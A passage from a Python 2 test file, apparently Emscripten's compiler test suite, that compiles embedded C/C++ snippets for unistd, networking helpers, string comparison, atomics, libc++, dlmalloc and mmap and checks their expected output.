int main()
{
std::string mystring("1 2 3");
std::istringstream is(mystring);
int one, two, three;
is >> one >> two >> three;
printf( "%i %i %i", one, two, three );
}
'''
for linkable in [0]:#, 1]:
print linkable
Settings.LINKABLE = linkable # regression check for issue #273
self.do_run(src, "1 2 3")
def test_fs_base(self):
Settings.INCLUDE_FULL_LIBRARY = 1
try:
addJS = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace('FS.init();', '').replace( # Disable normal initialization, replace with ours
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'filesystem', 'src.js'), 'r').read())
open(filename, 'w').write(src)
'''
src = 'int main() {return 0;}\n'
expected = open(path_from_root('tests', 'filesystem', 'output.txt'), 'r').read()
self.do_run(src, expected, post_build=addJS, extra_emscripten_args=['-H', 'libc/fcntl.h,libc/sys/unistd.h,poll.h,libc/math.h,libc/langinfo.h,libc/time.h'])
finally:
Settings.INCLUDE_FULL_LIBRARY = 0
def test_unistd_access(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'access.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'access.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'access.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_curdir(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'curdir.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'curdir.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'curdir.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_close(self):
src = open(path_from_root('tests', 'unistd', 'close.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'close.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_confstr(self):
src = open(path_from_root('tests', 'unistd', 'confstr.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'confstr.out'), 'r').read()
self.do_run(src, expected, extra_emscripten_args=['-H', 'libc/unistd.h'])
def test_unistd_ttyname(self):
src = open(path_from_root('tests', 'unistd', 'ttyname.c'), 'r').read()
self.do_run(src, 'success', force_c=True)
def test_unistd_dup(self):
src = open(path_from_root('tests', 'unistd', 'dup.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'dup.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_pathconf(self):
src = open(path_from_root('tests', 'unistd', 'pathconf.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'pathconf.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_truncate(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'truncate.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'truncate.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'truncate.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_swab(self):
src = open(path_from_root('tests', 'unistd', 'swab.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'swab.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_isatty(self):
src = open(path_from_root('tests', 'unistd', 'isatty.c'), 'r').read()
self.do_run(src, 'success', force_c=True)
def test_unistd_sysconf(self):
src = open(path_from_root('tests', 'unistd', 'sysconf.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'sysconf.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_login(self):
src = open(path_from_root('tests', 'unistd', 'login.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'login.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_unlink(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'unlink.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'unlink.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'unlink.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_links(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'links.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'links.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'links.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_sleep(self):
src = open(path_from_root('tests', 'unistd', 'sleep.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'sleep.out'), 'r').read()
self.do_run(src, expected)
def test_unistd_io(self):
add_pre_run = '''
def process(filename):
import tools.shared as shared
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
open(shared.path_from_root('tests', 'unistd', 'io.js'), 'r').read()
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'unistd', 'io.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'io.out'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run)
def test_unistd_misc(self):
src = open(path_from_root('tests', 'unistd', 'misc.c'), 'r').read()
expected = open(path_from_root('tests', 'unistd', 'misc.out'), 'r').read()
self.do_run(src, expected)
def test_uname(self):
src = r'''
#include <stdio.h>
#include <sys/utsname.h>
int main() {
struct utsname u;
printf("ret: %d\n", uname(&u));
printf("sysname: %s\n", u.sysname);
printf("nodename: %s\n", u.nodename);
printf("release: %s\n", u.release);
printf("version: %s\n", u.version);
printf("machine: %s\n", u.machine);
printf("invalid: %d\n", uname(0));
return 0;
}
'''
expected = '''
ret: 0
sysname: Emscripten
nodename: emscripten
release: 1.0
version: #1
machine: x86-JS
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_env(self):
src = open(path_from_root('tests', 'env', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'env', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_systypes(self):
src = open(path_from_root('tests', 'systypes', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'systypes', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_getloadavg(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
double load[5] = {42.13, 42.13, 42.13, 42.13, 42.13};
printf("ret: %d\n", getloadavg(load, 5));
printf("load[0]: %.3lf\n", load[0]);
printf("load[1]: %.3lf\n", load[1]);
printf("load[2]: %.3lf\n", load[2]);
printf("load[3]: %.3lf\n", load[3]);
printf("load[4]: %.3lf\n", load[4]);
return 0;
}
'''
expected = '''
ret: 3
load[0]: 0.100
load[1]: 0.100
load[2]: 0.100
load[3]: 42.130
load[4]: 42.130
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_inet(self):
src = r'''
#include <stdio.h>
#include <arpa/inet.h>
int main() {
printf("*%x,%x,%x,%x,%x,%x*\n", htonl(0xa1b2c3d4), htonl(0xfe3572e0), htonl(0x07abcdf0), htons(0xabcd), ntohl(0x43211234), ntohs(0xbeaf));
in_addr_t i = inet_addr("190.180.10.78");
printf("%x\n", i);
return 0;
}
'''
self.do_run(src, '*d4c3b2a1,e07235fe,f0cdab07,cdab,34122143,afbe*\n4e0ab4be\n')
def test_inet2(self):
src = r'''
#include <stdio.h>
#include <arpa/inet.h>
int main() {
struct in_addr x, x2;
int *y = (int*)&x;
*y = 0x12345678;
printf("%s\n", inet_ntoa(x));
int r = inet_aton(inet_ntoa(x), &x2);
printf("%s\n", inet_ntoa(x2));
return 0;
}
'''
self.do_run(src, '120.86.52.18\n120.86.52.18\n')
def test_gethostbyname(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip("assume t2 in gethostbyname")
src = r'''
#include <netdb.h>
#include <stdio.h>
void test(char *hostname) {
hostent *host = gethostbyname(hostname);
if (!host) {
printf("no such thing\n");
return;
}
printf("%s : %d : %d\n", host->h_name, host->h_addrtype, host->h_length);
char **name = host->h_aliases;
while (*name) {
printf("- %s\n", *name);
name++;
}
name = host->h_addr_list;
while (name && *name) {
printf("* ");
for (int i = 0; i < host->h_length; i++)
printf("%d.", (*name)[i]);
printf("\n");
name++;
}
}
int main() {
test("www.cheezburger.com");
test("fail.on.this.never.work"); // we will "work" on this - because we are just making aliases of names to ips
test("localhost");
return 0;
}
'''
self.do_run(src, '''www.cheezburger.com : 2 : 4
* -84.29.1.0.
fail.on.this.never.work : 2 : 4
* -84.29.2.0.
localhost : 2 : 4
* -84.29.3.0.
''')
def test_799(self):
src = open(path_from_root('tests', '799.cpp'), 'r').read()
self.do_run(src, '''Set PORT family: 0, port: 3979
Get PORT family: 0
PORT: 3979
''')
def test_ctype(self):
# The bit fiddling done by the macros using __ctype_b_loc requires this.
Settings.CORRECT_SIGNS = 1
src = open(path_from_root('tests', 'ctype', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'ctype', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_strcasecmp(self):
src = r'''
#include <stdio.h>
#include <strings.h>
int sign(int x) {
if (x < 0) return -1;
if (x > 0) return 1;
return 0;
}
int main() {
printf("*\n");
printf("%d\n", sign(strcasecmp("hello", "hello")));
printf("%d\n", sign(strcasecmp("hello1", "hello")));
printf("%d\n", sign(strcasecmp("hello", "hello1")));
printf("%d\n", sign(strcasecmp("hello1", "hello1")));
printf("%d\n", sign(strcasecmp("iello", "hello")));
printf("%d\n", sign(strcasecmp("hello", "iello")));
printf("%d\n", sign(strcasecmp("A", "hello")));
printf("%d\n", sign(strcasecmp("Z", "hello")));
printf("%d\n", sign(strcasecmp("a", "hello")));
printf("%d\n", sign(strcasecmp("z", "hello")));
printf("%d\n", sign(strcasecmp("hello", "a")));
printf("%d\n", sign(strcasecmp("hello", "z")));
printf("%d\n", sign(strcasecmp("Hello", "hello")));
printf("%d\n", sign(strcasecmp("Hello1", "hello")));
printf("%d\n", sign(strcasecmp("Hello", "hello1")));
printf("%d\n", sign(strcasecmp("Hello1", "hello1")));
printf("%d\n", sign(strcasecmp("Iello", "hello")));
printf("%d\n", sign(strcasecmp("Hello", "iello")));
printf("%d\n", sign(strcasecmp("A", "hello")));
printf("%d\n", sign(strcasecmp("Z", "hello")));
printf("%d\n", sign(strcasecmp("a", "hello")));
printf("%d\n", sign(strcasecmp("z", "hello")));
printf("%d\n", sign(strcasecmp("Hello", "a")));
printf("%d\n", sign(strcasecmp("Hello", "z")));
printf("%d\n", sign(strcasecmp("hello", "Hello")));
printf("%d\n", sign(strcasecmp("hello1", "Hello")));
printf("%d\n", sign(strcasecmp("hello", "Hello1")));
printf("%d\n", sign(strcasecmp("hello1", "Hello1")));
printf("%d\n", sign(strcasecmp("iello", "Hello")));
printf("%d\n", sign(strcasecmp("hello", "Iello")));
printf("%d\n", sign(strcasecmp("A", "Hello")));
printf("%d\n", sign(strcasecmp("Z", "Hello")));
printf("%d\n", sign(strcasecmp("a", "Hello")));
printf("%d\n", sign(strcasecmp("z", "Hello")));
printf("%d\n", sign(strcasecmp("hello", "a")));
printf("%d\n", sign(strcasecmp("hello", "z")));
printf("%d\n", sign(strcasecmp("Hello", "Hello")));
printf("%d\n", sign(strcasecmp("Hello1", "Hello")));
printf("%d\n", sign(strcasecmp("Hello", "Hello1")));
printf("%d\n", sign(strcasecmp("Hello1", "Hello1")));
printf("%d\n", sign(strcasecmp("Iello", "Hello")));
printf("%d\n", sign(strcasecmp("Hello", "Iello")));
printf("%d\n", sign(strcasecmp("A", "Hello")));
printf("%d\n", sign(strcasecmp("Z", "Hello")));
printf("%d\n", sign(strcasecmp("a", "Hello")));
printf("%d\n", sign(strcasecmp("z", "Hello")));
printf("%d\n", sign(strcasecmp("Hello", "a")));
printf("%d\n", sign(strcasecmp("Hello", "z")));
printf("%d\n", sign(strncasecmp("hello", "hello", 3)));
printf("%d\n", sign(strncasecmp("hello1", "hello", 3)));
printf("%d\n", sign(strncasecmp("hello", "hello1", 3)));
printf("%d\n", sign(strncasecmp("hello1", "hello1", 3)));
printf("%d\n", sign(strncasecmp("iello", "hello", 3)));
printf("%d\n", sign(strncasecmp("hello", "iello", 3)));
printf("%d\n", sign(strncasecmp("A", "hello", 3)));
printf("%d\n", sign(strncasecmp("Z", "hello", 3)));
printf("%d\n", sign(strncasecmp("a", "hello", 3)));
printf("%d\n", sign(strncasecmp("z", "hello", 3)));
printf("%d\n", sign(strncasecmp("hello", "a", 3)));
printf("%d\n", sign(strncasecmp("hello", "z", 3)));
printf("*\n");
return 0;
}
'''
self.do_run(src, '''*\n0\n1\n-1\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n0\n1\n-1\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n0\n1\n-1\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n0\n1\n-1\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n0\n0\n0\n0\n1\n-1\n-1\n1\n-1\n1\n1\n-1\n*\n''')
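# GCC __sync atomic builtins; in single-threaded JS these lower to plain
# read-modify-write operations.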
def test_atomic(self):
src = '''
#include <stdio.h>
int main() {
int x = 10;
int y = __sync_add_and_fetch(&x, 5);
printf("*%d,%d*\\n", x, y);
x = 10;
y = __sync_fetch_and_add(&x, 5);
printf("*%d,%d*\\n", x, y);
x = 10;
y = __sync_lock_test_and_set(&x, 6);
printf("*%d,%d*\\n", x, y);
x = 10;
y = __sync_bool_compare_and_swap(&x, 9, 7);
printf("*%d,%d*\\n", x, y);
y = __sync_bool_compare_and_swap(&x, 10, 7);
printf("*%d,%d*\\n", x, y);
return 0;
}
'''
self.do_run(src, '*15,15*\n*15,10*\n*6,10*\n*10,0*\n*7,1*')
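# Regression test: a field that is only conditionally initialized must not
# turn into an undef PHI value when read on the other branch.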
def test_phiundef(self):
src = r'''
#include <stdlib.h>
#include <stdio.h>
static int state;
struct my_struct {
union {
struct {
unsigned char a;
unsigned char b;
} c;
unsigned int d;
} e;
unsigned int f;
};
int main(int argc, char **argv) {
struct my_struct r;
state = 0;
for (int i=0;i<argc+10;i++)
{
if (state % 2 == 0)
r.e.c.a = 3;
else
printf("%d\n", r.e.c.a);
state++;
}
return 0;
}
'''
self.do_run(src, '3\n3\n3\n3\n3\n')
# libc++ tests
def test_iostream(self):
if Settings.QUANTUM_SIZE == 1: return self.skip("we don't support libcxx in q1")
if self.emcc_args is None:
if Building.LLVM_OPTS: return self.skip('optimizing bitcode before emcc can confuse libcxx inclusion')
self.emcc_args = [] # libc++ auto-inclusion is only done if we use emcc
Settings.SAFE_HEAP = 0 # Some spurious warnings from libc++ internals
src = '''
#include <iostream>
int main()
{
std::cout << "hello world" << std::endl << 77 << "." << std::endl;
return 0;
}
'''
# FIXME: should not have so many newlines in output here
self.do_run(src, 'hello world\n77.\n')
def test_stdvec(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <vector>
#include <stdio.h>
struct S {
int a;
float b;
};
void foo(int a, float b)
{
printf("%d:%.2f\\n", a, b);
}
int main ( int argc, char *argv[] )
{
std::vector<S> ar;
S s;
s.a = 789;
s.b = 123.456f;
ar.push_back(s);
s.a = 0;
s.b = 100.1f;
ar.push_back(s);
foo(ar[0].a, ar[0].b);
foo(ar[1].a, ar[1].b);
}
'''
self.do_run(src, '789:123.46\n0:100.1')
def test_reinterpreted_ptrs(self):
if self.emcc_args is None: return self.skip('needs emcc and libc')
src = r'''
#include <stdio.h>
class Foo {
private:
float bar;
public:
int baz;
Foo(): bar(0), baz(4711) {};
int getBar() const;
};
int Foo::getBar() const {
return this->bar;
};
const Foo *magic1 = reinterpret_cast<Foo*>(0xDEAD111F);
const Foo *magic2 = reinterpret_cast<Foo*>(0xDEAD888F);
static void runTest() {
const Foo *a = new Foo();
const Foo *b = a;
if (a->getBar() == 0) {
if (a->baz == 4712)
b = magic1;
else
b = magic2;
}
printf("%s\n", (b == magic1 ? "magic1" : (b == magic2 ? "magic2" : "neither")));
};
extern "C" {
int main(int argc, char **argv) {
runTest();
}
}
'''
self.do_run(src, 'magic2')
def test_jansson(self):
return self.skip('currently broken')
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('requires ta2')
if Settings.SAFE_HEAP: return self.skip('jansson is not safe-heap safe')
src = '''
#include <jansson.h>
#include <stdio.h>
#include <string.h>
int main()
{
const char* jsonString = "{\\"key\\": \\"value\\",\\"array\\": [\\"array_item1\\",\\"array_item2\\",\\"array_item3\\"],\\"dict\\":{\\"number\\": 3,\\"float\\": 2.2}}";
json_error_t error;
json_t *root = json_loadb(jsonString, strlen(jsonString), 0, &error);
if(!root) {
printf("Node `root` is `null`.");
return 0;
}
if(!json_is_object(root)) {
printf("Node `root` is no object.");
return 0;
}
printf("%s\\n", json_string_value(json_object_get(root, "key")));
json_t *array = json_object_get(root, "array");
if(!array) {
printf("Node `array` is `null`.");
return 0;
}
if(!json_is_array(array)) {
printf("Node `array` is no array.");
return 0;
}
for(size_t i=0; i<json_array_size(array); ++i)
{
json_t *arrayNode = json_array_get(array, i);
if(!arrayNode || !json_is_string(arrayNode))
return 0;
printf("%s\\n", json_string_value(arrayNode));
}
json_t *dict = json_object_get(root, "dict");
if(!dict || !json_is_object(dict))
return 0;
json_t *numberNode = json_object_get(dict, "number");
json_t *floatNode = json_object_get(dict, "float");
if(!numberNode || !json_is_number(numberNode) ||
!floatNode || !json_is_real(floatNode))
return 0;
printf("%i\\n", json_integer_value(numberNode));
printf("%.2f\\n", json_number_value(numberNode));
printf("%.2f\\n", json_real_value(floatNode));
json_t *invalidNode = json_object_get(dict, "invalidNode");
if(invalidNode)
return 0;
printf("%i\\n", json_number_value(invalidNode));
json_decref(root);
if(!json_is_object(root))
printf("jansson!\\n");
return 0;
}
'''
self.do_run(src, 'value\narray_item1\narray_item2\narray_item3\n3\n3.00\n2.20\nJansson: Node with ID `0` not found. Context has `10` nodes.\n0\nJansson: No JSON context.\njansson!')
### 'Medium' tests
def test_fannkuch(self):
results = [ (1,0), (2,1), (3,2), (4,4), (5,7), (6,10), (7, 16), (8,22) ]
for i, j in results:
src = open(path_from_root('tests', 'fannkuch.cpp'), 'r').read()
self.do_run(src, 'Pfannkuchen(%d) = %d.' % (i,j), [str(i)], no_build=i>1)
def test_raytrace(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.USE_TYPED_ARRAYS == 2: return self.skip('Relies on double value rounding, extremely sensitive')
src = open(path_from_root('tests', 'raytrace.cpp'), 'r').read().replace('double', 'float')
output = open(path_from_root('tests', 'raytrace.ppm'), 'r').read()
self.do_run(src, output, ['3', '16'])#, build_ll_hook=self.do_autodebug)
def test_fasta(self):
if self.emcc_args is None: return self.skip('requires emcc')
results = [ (1,'''GG*ctt**tgagc*'''), (20,'''GGCCGGGCGCGGTGGCTCACGCCTGTAATCCCAGCACTTT*cttBtatcatatgctaKggNcataaaSatgtaaaDcDRtBggDtctttataattcBgtcg**tacgtgtagcctagtgtttgtgttgcgttatagtctatttgtggacacagtatggtcaaa**tgacgtcttttgatctgacggcgttaacaaagatactctg*'''),
(50,'''GGCCGGGCGCGGTGGCTCACGCCTGTAATCCCAGCACTTTGGGAGGCCGAGGCGGGCGGA*TCACCTGAGGTCAGGAGTTCGAGACCAGCCTGGCCAACAT*cttBtatcatatgctaKggNcataaaSatgtaaaDcDRtBggDtctttataattcBgtcg**tactDtDagcctatttSVHtHttKtgtHMaSattgWaHKHttttagacatWatgtRgaaa**NtactMcSMtYtcMgRtacttctWBacgaa**agatactctgggcaacacacatacttctctcatgttgtttcttcggacctttcataacct**ttcctggcacatggttagctgcacatcacaggattgtaagggtctagtggttcagtgagc**ggaatatcattcgtcggtggtgttaatctatctcggtgtagcttataaatgcatccgtaa**gaatattatgtttatttgtcggtacgttcatggtagtggtgtcgccgatttagacgtaaa**ggcatgtatg*''') ]
for i, j in results:
src = open(path_from_root('tests', 'fasta.cpp'), 'r').read()
self.do_run(src, j, [str(i)], lambda x, err: x.replace('\n', '*'), no_build=i>1)
def test_whets(self):
if not Settings.ASM_JS: return self.skip('mainly a test for asm validation here')
self.do_run(open(path_from_root('tests', 'whets.cpp')).read(), 'Single Precision C Whetstone Benchmark')
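# Build dlmalloc from system/lib and stress it, both compiled-in and
# runtime-linked; then verify emcc links dlmalloc automatically and that
# each operator new variant pairs with the matching delete.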
def test_dlmalloc(self):
if self.emcc_args is None: self.emcc_args = [] # dlmalloc auto-inclusion is only done if we use emcc
self.banned_js_engines = [NODE_JS] # slower, and fail on 64-bit
Settings.CORRECT_SIGNS = 2
Settings.CORRECT_SIGNS_LINES = ['src.cpp:' + str(i+4) for i in [4816, 4191, 4246, 4199, 4205, 4235, 4227]]
Settings.TOTAL_MEMORY = 128*1024*1024 # needed with typed arrays
src = open(path_from_root('system', 'lib', 'dlmalloc.c'), 'r').read() + '\n\n\n' + open(path_from_root('tests', 'dlmalloc_test.c'), 'r').read()
self.do_run(src, '*1,0*', ['200', '1'])
self.do_run(src, '*400,0*', ['400', '400'], no_build=True)
# Linked version
src = open(path_from_root('tests', 'dlmalloc_test.c'), 'r').read()
self.do_run(src, '*1,0*', ['200', '1'], extra_emscripten_args=['-m'])
self.do_run(src, '*400,0*', ['400', '400'], extra_emscripten_args=['-m'], no_build=True)
if self.emcc_args == []: # TODO: do this in other passes too, passing their opts into emcc
# emcc should build in dlmalloc automatically, and do all the sign correction etc. for it
try_delete(os.path.join(self.get_dir(), 'src.cpp.o.js'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'dlmalloc_test.c'), '-s', 'TOTAL_MEMORY=' + str(128*1024*1024),
'-o', os.path.join(self.get_dir(), 'src.cpp.o.js')], stdout=PIPE, stderr=self.stderr_redirect).communicate()
self.do_run('x', '*1,0*', ['200', '1'], no_build=True)
self.do_run('x', '*400,0*', ['400', '400'], no_build=True)
# The same for new and all its variants
src = open(path_from_root('tests', 'new.cpp')).read()
for new, delete in [
('malloc(100)', 'free'),
('new char[100]', 'delete[]'),
('new Structy', 'delete'),
('new int', 'delete'),
('new Structy[10]', 'delete[]'),
]:
self.do_run(src.replace('{{{ NEW }}}', new).replace('{{{ DELETE }}}', delete), '*1,0*')
def test_dlmalloc_partial(self):
if self.emcc_args is None: return self.skip('only emcc will link in dlmalloc')
# provide part of dlmalloc's symbols, not all of them
src = open(path_from_root('tests', 'new.cpp')).read().replace('{{{ NEW }}}', 'new int').replace('{{{ DELETE }}}', 'delete') + '''
void *
operator new(size_t size)
{
printf("new %d!\\n", size);
return malloc(size);
}
'''
self.do_run(src, 'new 4!\n*1,0*')
def test_dlmalloc_partial_2(self):
if self.emcc_args is None or 'SAFE_HEAP' in str(self.emcc_args) or 'CHECK_HEAP_ALIGN' in str(self.emcc_args): return self.skip('only emcc will link in dlmalloc, and we do unsafe stuff')
# provide part of dlmalloc's symbols, not all of them. malloc is harder to link than new, which is weak.
src = r'''
#include <stdio.h>
#include <stdlib.h>
void *malloc(size_t size)
{
return (void*)123;
}
int main() {
void *x = malloc(10);
printf("got %p\n", x);
free(x);
printf("freed the faker\n");
return 1;
}
'''
self.do_run(src, 'got 0x7b\nfreed')
def test_libcxx(self):
if self.emcc_args is None: return self.skip('requires emcc')
self.do_run(open(path_from_root('tests', 'hashtest.cpp')).read(),
'june -> 30\nPrevious (in alphabetical order) is july\nNext (in alphabetical order) is march')
self.do_run('''
#include <set>
#include <stdio.h>
int main() {
std::set<int> *fetchOriginatorNums = new std::set<int>();
fetchOriginatorNums->insert(171);
printf("hello world\\n");
return 0;
}
''', 'hello world')
def test_typeid(self):
self.do_run(r'''
#include <stdio.h>
#include <string.h>
#include <typeinfo>
int main() {
printf("*\n");
#define MAX 100
int ptrs[MAX];
int groups[MAX];
memset(ptrs, 0, MAX*sizeof(int));
memset(groups, 0, MAX*sizeof(int));
int next_group = 1;
#define TEST(X) { \
int ptr = (int)&typeid(X); \
int group = 0; \
int i; \
for (i = 0; i < MAX; i++) { \
if (!groups[i]) break; \
if (ptrs[i] == ptr) { \
group = groups[i]; \
break; \
} \
} \
if (!group) { \
groups[i] = group = next_group++; \
ptrs[i] = ptr; \
} \
printf("%s:%d\n", #X, group); \
}
TEST(int);
TEST(unsigned int);
TEST(unsigned);
TEST(signed int);
TEST(long);
TEST(unsigned long);
TEST(signed long);
TEST(long long);
TEST(unsigned long long);
TEST(signed long long);
TEST(short);
TEST(unsigned short);
TEST(signed short);
TEST(char);
TEST(unsigned char);
TEST(signed char);
TEST(float);
TEST(double);
TEST(long double);
TEST(void);
TEST(void*);
printf("*\n");
}
''', '''*
int:1
unsigned int:2
unsigned:2
signed int:1
long:3
unsigned long:4
signed long:3
long long:5
unsigned long long:6
signed long long:5
short:7
unsigned short:8
signed short:7
char:9
unsigned char:10
signed char:11
float:12
double:13
long double:14
void:15
void*:16
*
''')
def test_static_variable(self):
if self.emcc_args is None: Settings.SAFE_HEAP = 0 # LLVM mixes i64 and i8 in the guard check
src = '''
#include <stdio.h>
struct DATA
{
int value;
DATA()
{
value = 0;
}
};
DATA & GetData()
{
static DATA data;
return data;
}
int main()
{
GetData().value = 10;
printf( "value:%i", GetData().value );
}
'''
self.do_run(src, 'value:10')
def test_fakestat(self):
src = r'''
#include <stdio.h>
struct stat { int x, y; };
int main() {
stat s;
s.x = 10;
s.y = 22;
printf("*%d,%d*\n", s.x, s.y);
}
'''
self.do_run(src, '*10,22*')
def test_mmap(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.TOTAL_MEMORY = 128*1024*1024
src = '''
#include <stdio.h>
#include <sys/mman.h>
#include <assert.h>
int main(int argc, char *argv[]) {
for (int i = 0; i < 10; i++) {
int* map = (int*)mmap(0, 5000, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANON, -1, 0);
/* TODO: Should we align to 4k?
assert(((int)map) % 4096 == 0); // aligned
*/
assert(munmap(map, 5000) == 0);
}
const int NUM_BYTES = 8 * 1024 * 1024;
const int NUM_INTS = NUM_BYTES / sizeof(int);
int* map = (int*)mmap(0, NUM_BYTES, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANON, -1, 0);
assert(map != MAP_FAILED);
int i;
for (i = 0; i < NUM_INTS; i++) {
map[i] = i;
}
for (i = 0; i < NUM_INTS; i++) {
assert(map[i] == i);
}
assert(munmap(map, NUM_BYTES) == 0);
printf("hello,world");
return 0;
}
'''
self.do_run(src, 'hello,world')
self.do_run(src, 'hello,world', force_c=True)
def test_mmap_file(self):
if self.emcc_args is None: return self.skip('requires emcc')
self.emcc_args += ['--embed-file', 'data.dat']
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
src = r'''
#include <stdio.h>
#include <sys/mman.h>
int main() {
printf("*\n");
FILE *f = fopen("data.dat", "r");
char *m;
m = (char*)mmap(NULL, 9000, PROT_READ, MAP_PRIVATE, fileno(f), 0);
for (int i = 0; i < 20; i++) putchar(m[i]);
munmap(m, 9000);
printf("\n");
m = (char*)mmap(NULL, 9000, PROT_READ, MAP_PRIVATE, fileno(f), 5);
for (int i = 0; i < 20; i++) putchar(m[i]);
munmap(m, 9000);
printf("\n*\n");
return 0;
}
'''
self.do_run(src, '*\ndata from the file .\nfrom the file ......\n*\n')
def test_cubescript(self):
if self.emcc_args is None: return self.skip('requires emcc')
if self.run_name == 'o2':
self.emcc_args += ['--closure', '1'] # Use closure here for some additional coverage
Building.COMPILER_TEST_OPTS = filter(lambda x: x != '-g', Building.COMPILER_TEST_OPTS) # remove -g, so we have one test without it by default
if self.emcc_args is None: Settings.SAFE_HEAP = 0 # the C++ code actually loads from some unwritten-to locations (note: unreachable here, since emcc-less runs were skipped above)
# Overflows happen in hash loop
Settings.CORRECT_OVERFLOWS = 1
Settings.CHECK_OVERFLOWS = 0
if Settings.USE_TYPED_ARRAYS == 2:
Settings.CORRECT_SIGNS = 1
self.do_run(path_from_root('tests', 'cubescript'), '*\nTemp is 33\n9\n5\nhello, everyone\n*', main_file='command.cpp')
assert 'asm2g' in test_modes
if self.run_name == 'asm2g':
results = {}
original = open('src.cpp.o.js').read()
results[Settings.ALIASING_FUNCTION_POINTERS] = len(original)
Settings.ALIASING_FUNCTION_POINTERS = 1 - Settings.ALIASING_FUNCTION_POINTERS
self.do_run(path_from_root('tests', 'cubescript'), '*\nTemp is 33\n9\n5\nhello, everyone\n*', main_file='command.cpp')
final = open('src.cpp.o.js').read()
results[Settings.ALIASING_FUNCTION_POINTERS] = len(final)
open('original.js', 'w').write(original)
print results
assert results[1] < 0.99*results[0]
assert ' & 3]()' in original, 'small function table exists'
assert ' & 3]()' not in final, 'small function table does not exist'
assert ' & 255]()' not in original, 'big function table does not exist'
assert ' & 255]()' in final, 'big function table exists'
def test_gcc_unmangler(self):
Settings.NAMED_GLOBALS = 1 # test coverage for this
Building.COMPILER_TEST_OPTS += ['-I' + path_from_root('third_party')]
self.do_run(open(path_from_root('third_party', 'gcc_demangler.c')).read(), '*d_demangle(char const*, int, unsigned int*)*', args=['_ZL10d_demanglePKciPj'])
#### Code snippet that is helpful to search for nonportable optimizations ####
#global LLVM_OPT_OPTS
